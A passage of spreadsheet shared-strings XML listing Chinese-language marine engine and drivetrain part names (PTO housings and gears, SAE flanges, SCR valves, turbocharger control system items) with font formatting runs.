      <t>壳体下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体下部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体中部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体中部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前安装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前尺寸图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用小齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用中间法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用轴带齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴带小齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴带小齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴方向传动支座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴配接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴轴？毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>容量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大力矩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Q144 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Q48 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Q72 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Q80 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Q96 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Q96 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>QI-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>R/I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>RC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>RENK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>R-I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>R-I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器插座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>RMD402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>RMP402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ROT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>S.P.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀关闭铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>S.P.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀开启铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SACS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SAE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对焊法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SAE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对开法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SAE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰适配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SAE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反向法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SAE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SAE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SBU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">SCR </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">SCR </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接触感应器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统配置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SKF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SLK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SMP 402A-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从属操作盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SMP402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作面板从属设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SMS402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作面板从属设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SOLAS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防溅带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SPM-A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>同步器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定螺丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>S-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T.C.&amp;A.C.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T/C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T/C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关闭控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T/C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T/C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T/C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动监视</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T+P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T+P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>T+P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TC/AC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCR18</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCR20</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>必要容量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>陆上试车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS/PTO/PTI/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS/PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>TC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发货型式</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
